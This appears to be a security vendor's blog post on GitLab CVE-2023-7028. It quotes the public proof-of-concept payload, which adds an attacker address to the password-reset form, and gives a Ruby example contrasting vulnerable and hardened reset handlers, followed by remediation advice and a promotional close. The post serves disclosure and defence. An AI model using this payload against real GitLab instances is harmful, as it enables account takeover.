Gal Nagli
CEO
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. This is a Critical severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, 10.0). It is now mitigated in the latest release and is assigned CVE-2023-7028.
The Proof of Concept (as posted on Twitter)
user[email][]=valid@email.com&user[email][]=attacker@email.com: submitting this payload to the password reset page of an affected instance causes the reset token email to be delivered to the attacker's own address rather than to the legitimate user.
Remediation includes implementing SSO, updating the instance to a patched version, and ensuring that 2FA is enabled.
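To make the bug class concrete from the defender's side, here is an added example (not GitLab's code) that contrasts the vulnerable parameter handling with a hardened password-reset handler. The user store, the minimal nested-parameter parser and the handler functions are constructed stand-ins for a Rails-style endpoint.

```ruby
require "cgi"

# Added example (not GitLab's code): the parameter-handling bug class behind
# CVE-2023-7028 beside a hardened form. The user store and request parsing
# are constructed stand-ins for a Rails-style password reset endpoint.

# Constructed user records: each account has a list of verified addresses.
USERS = [
  { id: 1, verified_emails: ["valid@email.com"] },
].freeze

def find_user_by_verified_email(email)
  USERS.find { |u| u[:verified_emails].include?(email) }
end

# Minimal Rack-style nested parameter parser: user[email]=x yields a String,
# user[email][]=x&user[email][]=y yields an Array (a trailing [] collects
# repeated values). This shape difference is what the payload relies on.
def parse_nested_query(query)
  CGI.parse(query).each_with_object({}) do |(key, values), out|
    parts = key.scan(/\A[^\[]+|\[[^\]]*\]/).map { |p| p.gsub(/[\[\]]/, "") }
    collect = parts.last == ""
    parts.pop if collect
    leaf = parts.pop
    node = parts.reduce(out) { |h, p| h[p] ||= {} }
    node[leaf] = collect ? values : values.last
  end
end

# Vulnerable pattern: whatever shape the parameter has is coerced to an
# array, the account is looked up by the first address, and the reset token
# is mailed to every address in the request, verified or not.
def reset_recipients_vulnerable(params)
  emails = Array(params.dig("user", "email"))
  user = find_user_by_verified_email(emails.first)
  return [] unless user
  emails
end

# Hardened pattern: the parameter must be a single String, it is used only
# to locate the account, and the token goes only to that account's own
# verified addresses, never to an address taken from the request.
def reset_recipients_hardened(params)
  email = params.dig("user", "email")
  return [] unless email.is_a?(String)
  user = find_user_by_verified_email(email.strip.downcase)
  return [] unless user
  user[:verified_emails]
end
```

Run it against both the normal request and the array-shaped one: the vulnerable handler returns both addresses for the second, while the hardened handler rejects it and only ever returns the account's verified addresses.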
Closing Words
As always, our scanning engines evaluated the issue for our customers within minutes of the announcement, and the relevant notifications were sent automatically.
As proof of our speed and rapid response, we were the first to report the issue to a leading bank through HackerOne's platform.